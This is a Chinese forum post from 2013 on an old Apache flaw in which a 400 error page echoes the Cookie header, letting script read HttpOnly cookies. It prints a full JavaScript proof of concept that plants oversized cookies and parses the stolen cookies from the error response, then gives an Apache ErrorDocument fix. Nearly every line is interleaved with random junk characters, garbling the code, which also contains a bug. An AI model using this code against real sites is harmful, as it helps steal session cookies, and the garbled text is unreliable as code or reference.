很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。- @2 w& K) b- z+ L6 w- C
/ C6 B5 |0 T7 [
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
- D0 P7 m* j a* j
$ D0 O2 V6 ?6 |) P/ K8 U; s" @3 I+ G! ]) `
// http://www.exploit-db.com/exploits/18442/4 O6 L3 n# g) X- E
function setCookies (good) {
$ h p: t! d4 y3 \8 R// Construct string for cookie value
* y# G0 T0 K' x9 y/ M% s& ovar str = "";
0 ^2 J8 b7 a2 U" X) A/ a0 dfor (var i=0; i< 819; i++) {
* v$ L# x; u- Q6 d1 ~' tstr += "x";
( y* _7 k8 |9 r: A0 S}* E, J. y5 t3 h3 n+ s2 t% T
// Set cookies$ ?+ ^% d3 C. _2 u C8 ?& D/ k, I
for (i = 0; i < 10; i++) {* l4 o5 o! \* B) z9 |
// Expire evil cookie
% _) X, D% y' C/ {2 Y3 yif (good) {) \) e8 q$ ] ~8 b3 y! G
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";2 C1 M( x B1 P
}
& v5 o# j6 q# t// Set evil cookie
, e9 ~7 D# f d- belse {( u% Q& x& O! o* d9 U2 O
var cookie = "xss"+i+"="+str+";path=/";0 r. h8 z f0 }# M
}3 P% l- |# g4 o) w
document.cookie = cookie;
: b. E; ~, M! e) ]# H, m; q6 G}0 t" M, X+ z8 F) e
}/ Z) ]9 {$ [' L* K! m O
function makeRequest() {
+ J4 j. F" b+ S+ ~9 n0 `' BsetCookies();
6 e8 T0 E2 K* Q- bfunction parseCookies () {
+ D+ t! U+ ~+ f9 hvar cookie_dict = {};4 Y1 B5 g; q2 _
// Only react on 400 status
9 a: }: a8 e/ {6 @6 c8 Xif (xhr.readyState === 4 && xhr.status === 400) {6 Z, L1 p- ` }5 m
// Replace newlines and match <pre> content
& w; B* e- v! H$ Q, z; U& ], _var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
/ B0 b6 E4 }7 @' ^/ v$ j! Uif (content.length) {
! R& Y! y- K5 K' L) e// Remove Cookie: prefix
- o: C& F( B9 {. M! g# hcontent = content[1].replace("Cookie: ", "");
1 u4 Q/ Z! m6 Rvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);1 L- C9 t b6 [% w7 @
// Add cookies to object$ E; V3 ~" z" A$ G, \. f
for (var i=0; i<cookies.length; i++) {5 R4 T. c( E! ]
var s_c = cookies.split('=',2);
; p$ P0 ~; S( h6 K, ]1 ecookie_dict[s_c[0]] = s_c[1];/ c8 ^5 w1 ^ L5 L2 ]4 C
}
' L) d* I {. ^ T}: e" B, B* G1 {# H
// Unset malicious cookies% c6 f1 y g2 m: Q( q6 o3 O) L; d
setCookies(true);2 D" [0 ?+ T. q5 S
alert(JSON.stringify(cookie_dict));4 T5 d! [. G4 w4 E) Q
}
( n) C/ j# K# c& N/ T- O* B% z}7 t# B9 n! L! h `% M3 F
// Make XHR request
G! U/ n @4 n8 yvar xhr = new XMLHttpRequest();% [& s3 R/ K! v4 X4 `- S+ _
xhr.onreadystatechange = parseCookies;
' J- v$ n# x& ~% W& Vxhr.open("GET", "/", true);* {1 U9 h2 n6 a# s4 I
xhr.send(null);5 M# D0 R" A5 \: i4 p( x
}& I9 r9 x# S) `$ P! m
makeRequest();
4 _" n! l! U# O5 S% I) A: w6 |9 F% R* S2 [
你就能看见华丽丽的400错误包含着cookie信息。
3 U) x/ a, h1 T$ I9 O7 ]; \% S( k
, b1 _7 c) p% ?, [下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#+ F' K' C5 M' N
% Y1 i s2 n: ^! F9 F修复方案:
) M3 w9 W; m P1 J4 f
G) y P* N1 I$ {, l4 CApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
! i1 ]' @! V9 D1 q0 s; {8 @- n9 Z8 h5 R
In the event of a problem or error, Apachecan be configured to do one of four things,
6 D, x; Z9 W1 G7 N8 P8 H- z) R0 u! D% a% h4 C
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
. w" r1 b3 L8 m z7 Y% C2. output acustomized message输出一段信息
) s5 Z" Y8 f2 l7 O3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 " ^/ A) c0 o5 x( _* J3 a
4. redirect to an external URL to handle theproblem/error转向一个外部URL
; `3 f) |# z$ ~
+ ]5 v. v; O: g4 d+ {# T经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
( |4 s4 d2 q( T/ g( I& d9 M& h& D6 O/ s, y; O
Apache配置:
- \3 g6 e- k" q8 C {& U$ p/ C* d
ErrorDocument400 " security test": Y/ I' E) S0 N/ ` w
5 G# A3 Q1 ?7 `1 k8 g# V: U9 }# V当然,升级apache到最新也可:)。; \, j7 o, x2 p) t. g$ l/ F
& A! e8 b1 f9 g4 I' D: U1 E H参考:http://httpd.apache.org/security/vulnerabilities_22.html
. b. b. ^$ ]* @- G3 ]) u
; c4 ~" H' t( ]0 ?; X |
发表于 2013-4-19 19:15:43
收藏
支持
反对